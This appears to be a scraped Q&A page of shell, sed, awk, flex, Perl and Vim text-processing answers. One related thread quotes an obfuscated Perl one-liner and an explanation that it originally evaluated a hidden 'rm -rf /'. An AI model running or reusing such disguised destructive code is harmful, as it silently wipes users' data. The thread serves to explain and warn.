Make sed not buffer by lines - perl

I'm not trying to prevent sed from block-buffering! I am looking to get it to not even line-buffer.
I am not sure if this is even possible at all.
Basically there is a big difference between the behavior of sed and that of cat when interacting with them from a raw pseudo-terminal: cat will immediately spit back the inserted characters when it receives them over STDIN, while sed even in raw mode will not.
Consider a thought experiment: given a simple sed command such as s/abc/zzz/g, sending sed the input stream 123ab means that at best it can emit the characters 123 over standard output, because it does not yet know whether a c will arrive and make the result 123zzz; any other character would have it print exactly what came in (allowing it to "catch up", if you will). So in a way it's obvious why cat does respond immediately: it can afford to.
So of course that's how it would work in an ideal world where sed's authors actually cared about this kind of a use case.
I suspect that that is not the case. In reality, through my not too terribly exhaustive methods, I see that sed will line buffer no matter what (which allows it to always be able to figure out whether to print the 3 z's or not), unless you tell it that you care about matching your regexes past/over newlines, in which case it will just buffer the whole damn thing before providing any output.
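You can watch this line buffering from the shell; in this sketch (the filenames and patterns are just illustrative), the first write produces no output at all, and everything appears only once the newline completes the line:

```shell
# sed emits nothing for "123ab"; the whole line shows up only after the \n
{ printf '123ab'; sleep 1; printf 'c\n'; } | sed 's/abc/zzz/g'
```

With the sleep in place you can see the one-second pause before 123zzz appears, even though 123 was decidable immediately.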
My ideal solution is to find a sed that will spit out all the text that it has already finished parsing, without waiting till the end of line to do so. In my little example above, it would instantly spit back the characters 1, 2, and 3, and while a and b are being entered (typed), it says nothing, till either a c is seen (prints zzz), or any other character X is seen, in which case abX is printed, or in the case of EOF ab is printed.
Am I SOL? Should I just incrementally implement my Perl code with the features I want, or is there still some chance that this sort of magically delicious functionality can be got through some kind of configuration?
See another question of mine for more details on why I want this.
So, one potential workaround is to manually establish groups of input to "split" across calls to sed (or, in my case, since I'm already dealing with a Perl script, across Perl's regex replacement operators) so that I can do the flushing manually. But this cannot achieve the same level of responsiveness, because it requires me to think through the expression to decide where the "buffering" should occur, rather than having a regex parser figure it out automatically.

There is a tool that matches an input stream against multiple regular expressions in parallel and acts as soon as it decides on a match. It's not sed. It's lex. Or the GNU version, flex.
To make this demonstration work, I had to define a YY_INPUT macro, because flex was line-buffering input by default. Even with no buffering at the stdio level, and even in "interactive" mode, there is an assumption that you don't want to process less than a line at a time.
So this is probably not portable to other versions of lex.
%{
#include <stdio.h>
#define YY_INPUT(buf,result,max_size) \
    { \
        int c = getchar(); \
        result = (c == EOF) ? YY_NULL : (buf[0] = c, 1); \
    }
%}
%%
abc fputs("zzz", stdout); fflush(stdout);
. fputs(yytext, stdout); fflush(stdout);
%%
int main(void)
{
    setbuf(stdin, 0);
    yylex();
    return 0;
}
Usage: put that program into a file called abczzz.l and run
flex --always-interactive -o abczzz.c abczzz.l
cc abczzz.c -ll -o abczzz
for ch in a b c 1 2 3 ; do echo -n $ch ; sleep 1 ; done | ./abczzz ; echo

You can actually write entire programs in sed.
Here is a way to slurp the whole file into the editing buffer. I added -n to suppress automatic printing and $p so it only prints at the end, after I swap the hold space I have been building up with the current pattern space.
sed -n 'H;$x;$p' FILENAME
You can conditionally build up the hold space based on patterns you encounter:
'/pattern/{H}'
You can conditionally print the buffer as well:
'/pattern/{p}'
You can even nest these conditional blocks, if you feel saucy.
You could use a combination of `g' (to copy the hold space to the pattern space, thereby overwriting it) and then s/(.).*/\1/ and such to get at individual characters.
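For instance, a minimal sketch of that last idea, reducing each line of some sample input to its first character:

```shell
# keep only the first character of every line
printf 'hello\nworld\n' | sed 's/\(.\).*/\1/'
```

This prints h and w on separate lines; combine it with g/H/x as above to do the same to text accumulated in the hold space.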
I hope this was at least informative. I would advise you to write a tool in a different language.

Related

Best scripting tool to profile a log file

I have extracted log files from servers based on my date and time requirement and after extraction it has hundreds of HTTP requests (URLs). Each request may or may not contain various parameters a,b,c,d,e,f,g etc.,
For example:
http:///abcd.com/blah/blah/blah%20a=10&b=20ORC
http:///abcd.com/blah/blah/blahsomeotherword%20a=30&b=40ORC%26D
http:///abcd.com/blah/blah/blahORsomeORANDworda=30%20b=40%20C%26D
http:///abcd.com/blah/blah/"blah"%20b=40ORCANDD%20G%20F
I wrote a shell script that profiles this log file in a while loop, grepping each request for the different parameters a, b, c, d, e: if a request contains a given parameter, report that parameter's value, or else TRUE or FALSE.
while read line ; do
    echo -n -e $line | sed 's/^.*XYZ:/ /;s/ms.*//' >> output.txt
    echo -n -e "\t" >> output.txt
    echo -n -e $line | sed 's/^.*XYZ:/ /;s/ABC.*//' >> output.txt
    echo -n -e "\t" >> output.txt
    echo -n -e $line | sed 's/^.*?q=/ /;s/AUTH_TYPE:.*//' >> output.txt
    echo -n -e "\t" >> output.txt
    echo " " >> output.txt
done < queries.csv
My question is, my cygwin is taking lot of time (an hour or so) to execute on a log file containing 70k-80k requests. Is there a best way to write this script so that it executes asap? I'm okay with perl too. But my concern is, the script is flexible enough to execute and extract parameters.
As @reinerpost already pointed out, the loop-internal redirection is probably the #1 killer issue here. You might be able to reap significant gains already by switching from
while read line; do
something >>file
something else too >>file
done <input
to instead do a single redirection after done:
while read line; do
something
something else too
done <input >file
Notice how this also simplifies the loop body, and allows you to overwrite the file when you (re)start the script, instead of separately needing to clean out any old results. As also suggested by @reinerpost, not hard-coding the output file would make your script more general; simply print to standard output, and let the invoker decide what to do with the results. So maybe just remove the redirections altogether.
(Incidentally, you should switch to read -r unless you specifically want the shell to interpret backslashes and other slightly weird legacy behavior.)
Additionally, collecting results and doing a single print at the end would probably be a lot more efficient than the repeated unbuffered echo -n -e writes. (And again, printf would probably be preferable to echo for both portability and usability reasons.)
The current script could be reimplemented in sed quite easily. You collect portions of the input URL and write each segment to a separate field. This is easily done in sed with the following logic: Save the input to the hold space. Swap the hold space and the current pattern space, perform the substitution you want, append to the hold space, and swap back the input into the pattern space. Repeat as necessary.
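A minimal sketch of that hold-space dance on a made-up line (GNU sed; the XYZ/ABC markers are illustrative, matching the patterns from the question):

```shell
# h: save the original line; carve field 1 out of the pattern space;
# x: stash field 1 in the hold space and get the original back;
# carve field 2; H: append it below field 1; x: fetch both; join with a tab
echo 'XYZ:42ms foo ABC bar' |
  sed 'h;s/.*XYZ://;s/ms.*//;x;s/.*XYZ://;s/ABC.*//;H;x;s/\n/\t/'
```

Each additional field is one more x / substitute / H round trip, which is exactly why this gets tedious fast.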
Because your earlier script was somewhat more involved, I'm suggesting to use Awk instead. Here is a crude skeleton for doing things you seem to be wanting to do with your data.
awk '# Make output tab-delimited
BEGIN { OFS="\t" }
{ xyz_ms = $0; sub("^.*XYZ:", " ", xyz_ms); sub("ms.*$", "", xyz_ms);
xyz_abc = $0; sub("^.*XYZ:", " ", xyz_abc); sub("ABC.*$", "", xyz_abc);
q = $0; sub("^.*?q=", " ", q); sub("AUTH_TYPE:.*$", "", q);
# ....
# Demonstration of how to count something
n = split($0, _, "&"); ampersand_count = n-1;
# ...
# Done: Now print
print xyz_ms, xyz_abc, q, " " }' queries.csv
Notice how we collect stuff in variables and print only at the end. This is less crucial here than it would have been in your earlier shell script, though.
The big savings here come from avoiding spawning a large number of subprocesses for each input line. Awk is also better optimized for doing this sort of processing quickly.
If Perl is more convenient for you, converting the entire script to Perl should produce similar benefits, and be somewhat more compatible with the sed-centric syntax you have already. Perl is bigger and sometimes slower than Awk, but in the grand scheme of things, not by much. If you really need to optimize, do both and measure.
Problems with your script:
The main problem: you append to a file in every statement. This means the file has to be opened and closed in every statement, which is extremely inefficient.
You hardcode the name of the output file in your script. This is a bad practice. Your script will be much more versatile if it just writes its output to stdout; leave it to the caller to specify where to direct the output. That will also get rid of the previous problem.
bash is interpreted and not optimized for text manipulation: it is bound to be slow, and complex text filtering won't be very readable. Using awk instead will probably make the script more concise and more readable (once you know the language); however, if you don't know awk yet, I advise learning Perl instead, which is good at what awk is good at but is also a general-purpose language: it makes you far more flexible, allows for even more readable code (those who complain about Perl being hard to read have never seen nontrivial shell scripts), and will probably be a lot faster, because perl compiles scripts prior to running them. If you'd rather invest your efforts into a more popular language than Perl, try Python.

how many instances did a command affect?

Is there a way when using sed from the cli to return how many lines were affected, or better yet how many instances were affected by a command that might have multiple effects per line if the global param is used? Pretty much, for me, that would mean how many substitutions were made.
I guess one could output to a new file and then run a diff on the two files afterward, but my need to know how many instances a command affects is not that great to do that. I just wondered if there might be a feature native to sed that can be employed.
As far as I know, sed has no native feature for manipulating variables (e.g. for incrementing an internal counter). That is definitely one of the features brought by awk that was lacking in sed. So my advice would be to switch to awk, where you can easily use a script such as:
BEGIN { counter = 0 }
/mypattern/ { do-whatever-you-want; counter++ }
END { print counter }
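To count individual substitutions rather than matching lines, gsub's return value does the bookkeeping for you; a sketch with made-up input:

```shell
# gsub returns the number of replacements it made on each line
printf 'foo bar foo\nbaz\nfoo\n' |
  awk '{ n += gsub(/foo/, "FOO") } END { print n }'
```

Here the answer is 3, even though only two lines matched.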
You ask for a sed solution. Here is a pure sed approach that does some of what you want:
sed 's/old/new/;t change;b;:change w changes'
After executing this, the changed lines, if any, are written to the file changes.
How it works:
s/old/new/;
Replace this with whatever substitution you want to do.
t change;
This tells sed to jump to the label change if the preceding s command made any changes.
b;
If the preceding jump did not happen, then this b command is executed which ends the processing of this line.
:change w changes
This tells sed to write the current line, as changed by your s command, to the file changes.
The Next Step
The next step here would be to count the changes. To this end, sed can do arithmetic but it is not for the faint of heart.
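The easier road is to let the shell do the counting on the changes file afterwards; a sketch using the portable multi-`-e` form from below (the file names are made up):

```shell
printf 'old\nkeep\nold\n' > input.txt
sed -e 's/old/new/' -e 't change' -e b -e ':change' -e 'w changes' \
    input.txt > /dev/null
wc -l < changes    # number of lines on which a substitution happened
```

Note this counts changed lines, not individual substitutions, matching the semantics of the t test.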
OSX
As I recall, the version of sed on Mac OSX does not support chaining commands together with semicolons. Instead, try:
sed -e 's/old/new/' -e 't change' -e b -e ':change w changes'

sed recipe: how to do stuff between two patterns that can be either on one line or on two lines?

Let's say we want to do some substitutions only between some patterns, let them be <a> and </a> for clarity... (all right, all right, they're start and end!.. Jeez!)
So I know what to do if start and end always occur on the same line: just design a proper regex.
I also know what to do if they're guaranteed to be on different lines and I don't care about anything in the line containing end and I'm also OK with applying all the commands in the line containing start before start: just specify the address range as /start/,/end/.
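For the record, a toy run of that address-range form (GNU sed, for the \U):

```shell
# uppercase every line between the start and end markers, inclusive
printf 'a\nstart\nb\nend\nc\n' | sed '/start/,/end/s/.*/\U&/'
```

Both marker lines and everything between them get transformed, which is exactly the coarseness complained about below.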
This, however, doesn't sound very useful. What if I need to do a smarter job, for instance, introduce changes inside a {...} block?
One thing I can think of is breaking the input on { and } before processing and putting it back together afterwards:
sed 's/{\|}/\n/g' input | sed 'main stuff' | sed ':a $!{N;ba}; s/\n\(}\|{\)\n/\1/g'
Another option is the opposite:
cat input | tr '\n' '#' | sed 'whatever; s/#/\n/g'
Both of these are ugly, mainly because the operations are not confined within a single command. The second one is even worse because one has to use some character or substring as a "newline holder" assuming it isn't present in the original text.
So the question is: are there better ways or can the above-mentioned ones be optimized? This is quite a regular task from what I read in recent SO questions, so I'd like to choose the best practice once and for all.
P.S. I'm mostly interested in pure sed solutions: can the job be done with one invocation of sed and nothing else? Please no awk, Perl, etc.: this is more of a theoretical question, not a "need the job done asap" one.
This might work for you:
# create multiline test data
cat <<\! >/tmp/a
> this
> this { this needs
> changing to
> that } that
> that
> !
sed '/{/!b;:a;/}/!{$q;N;ba};h;s/[^{]*{//;s/}.*//;s/this\|that/\U&/g;x;G;s/{[^}]*}\([^\n]*\)\n\(.*\)/{\2}\1/' /tmp/a
this
this { THIS needs
changing to
THAT } that
that
# convert multiline test data to a single line
tr '\n' ' ' </tmp/a >/tmp/b
sed '/{/!b;:a;/}/!{$q;N;ba};h;s/[^{]*{//;s/}.*//;s/this\|that/\U&/g;x;G;s/{[^}]*}\([^\n]*\)\n\(.*\)/{\2}\1/' /tmp/b
this this { THIS needs changing to THAT } that that
Explanation:
Read the data into the pattern space (PS). /{/!b;:a;/}/!{$q;N;ba}
Copy the data into the hold space (HS). h
Strip non-data from front and back of string. s/[^{]*{//;s/}.*//
Convert data e.g. s/this\|that/\U&/g
Swap to HS and append converted data. x;G
Replace old data with converted data. s/{[^}]*}\([^\n]*\)\n\(.*\)/{\2}\1/
EDIT:
A more complicated answer which I think caters for more than one block per line.
# slurp file into pattern space (PS)
:a
$! {
N
ba
}
# check for presence of \v if so quit with exit value 1
/\v/q1
# replace original newlines with \v's
y/\n/\v/
# append a newline to PS as a delimiter
G
# copy PS to hold space (HS)
h
# starting from right to left delete everything but blocks
:b
s/\(.*\)\({.*}\).*\n/\1\n\2/
tb
# delete any non-block details from the start of the file
s/.*\n//
# PS contains only block details
# do any block processing here e.g. uppercase this and that
s/th\(is\|at\)/\U&/g
# append ps to hs
H
# swap to HS
x
# replace each original block with its processed one from right to left
:c
s/\(.*\){.*}\(.*\)\n\n\(.*\)\({.*}\)/\1\n\n\4\2\3/
tc
# delete newlines
s/\n//g
# restore original newlines
y/\v/\n/
# done!
N.B. This uses GNU-specific options but could be tweaked to work with other sed implementations.

Perl specific code

The following program is in Perl.
cat "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-#[-`{-};`-{/" -;;s;;$_;see'
Can somebody help me to understand how it works?
This bit of code's already been asked about on the Debian forums.
According to Lacek, the moderator on that thread, what the code originally did is rm -rf /, though they mention they've changed the version there so that people trying to figure out how it works don't delete their entire filesystem. There's also an explanation there of what the various parts of the Perl code do.
(Did you post this knowing what it did, or were you unaware of it?)
To quote Lacek's post on it:
Anyway, here is how the script works.
It is basically two regex substitutions and one transliteration.
Piping anything into its standard input makes no difference, the perl
code doesn't use its input in any way. If you split the long line on
the boundaries of the expressions, you get this:
$??s:;s:s;;$?::
s;;=]=>%-{\\>%<-{;;
y; -/:-#[-`{-};`-{/" -;;
s;;$_;see
The first line is a condition which does nothing save make the code
look more difficult. If the previous command originating from the perl
code wasn't successful, it does some substitutions on the standard
input (which the program doesn't use, so effectively it substitutes
the nothing). Since no previous command exists, $? is always 0, so the
first line never gets executed.
The second line substitutes the
standard input (the nothing) for seemingly meaningless garbage.
The third line is a transliteration operator. It defines 4 ranges, in
which the characters gets substituted to the one range and the 4
characters given in the transliteration replacement. I'd prefer not to
write the whole transliteration table here, because it's a bit long.
If you are really interested, just write the characters in the defined
ranges (space to '/', ':' to '#', '[' to '(backtick)', and '{' to '}'), and
write next to them the characters from the replacement range ('(backtick)' to
'{'), and finally, write the remaining characters (/,", space and -)
from the replacement pattern. When you have this table, you can see
what character gets replaced to what.
The last line executes the
resulting command by substituting the nothing with the resulted string
(which is 'xterm'. Originally it was 'system"rm -rf /"', and is held
in $_), evaluates the substitution as an expression and executes it.
(I've substituted 'backtick' for the actual backtick character here so that the code auto-formatting doesn't kick in.)

How to reformat a source file to go from 2 space indentations to 3?

This question is nearly identical to an earlier one, except that I have to go to three spaces (company coding guidelines) rather than four, and the accepted solution there will only double the matched pattern. Here was my first attempt:
:%s/^\(\s\s\)\+/\1 /gc
But this does not work because four spaces get replaced by three. So I think that what I need is some way to get the count of how many times the pattern matched "+" and use that number to create the other side of the substitution but I feel this functionality is probably not available in Vim's regex (Let me know if you think it might be possible).
I also tried doing the substitution manually by replacing the largest indents first and then the next smaller indent until I got it all converted but this was hard to keep track of the spaces:
:%s/^ \(\S\)/ \1/gc
I could send it through Perl as it seems like Perl might have the ability to do it with its Extended Patterns. But I could not get it to work with my version of Perl. Here was my attempt with trying to count a's:
:%!perl -pe 'm<(?{ $cnt = 0 })(a(?{ local $cnt = $cnt + 1; }))*aaaa(?{ $res = $cnt })>x; print $res'
My last resort will be to write a Perl script to do the conversion but I was hoping for a more general solution in Vim so that I could reuse the idea to solve other issues in the future.
Let vim do it for you?
:set sw=3<CR>
gg=G
The first command sets the shiftwidth option, which is how much you indent by. The second line says: go to the top of the file (gg), and reindent (=) until the end of the file (G).
Of course, this depends on vim having a good formatter for the language you're using. Something might get messed up if not.
Regexp way... Safer, but less understandable:
:%s#^\(\s\s\)\+#\=repeat(' ',strlen(submatch(0))*3/2)#g
(I had to do some experimentation.)
Two points:
If the replacement starts with \=, it is evaluated as an expression.
You can use many things instead of /, so / is available for division.
The perl version you asked for...
From the command line (edits in-place, no backup):
bash$ perl -pi -e 's{^((?:  )+)}{"   " x (length($1)/2)}e' YOUR_FILE
(in-place, original backed up to "YOUR_FILE.bak"):
bash$ perl -pi.bak -e 's{^((?:  )+)}{"   " x (length($1)/2)}e' YOUR_FILE
From vim while editing YOUR_FILE:
:%!perl -pe 's{^((?:  )+)}{"   " x (length($1)/2)}e'
The regex matches the beginning of the line, followed by (the captured set of) one or more "two space" groups. The substitution pattern is a perl expression (hence the 'e' modifier) which counts the number of "two space" groups that were captured and creates a string of that same number of "three space" groups. If an "extra" space was present in the original it is preserved after the substitution. So if you had three spaces before, you'll have four after, five before will turn into seven after, etc.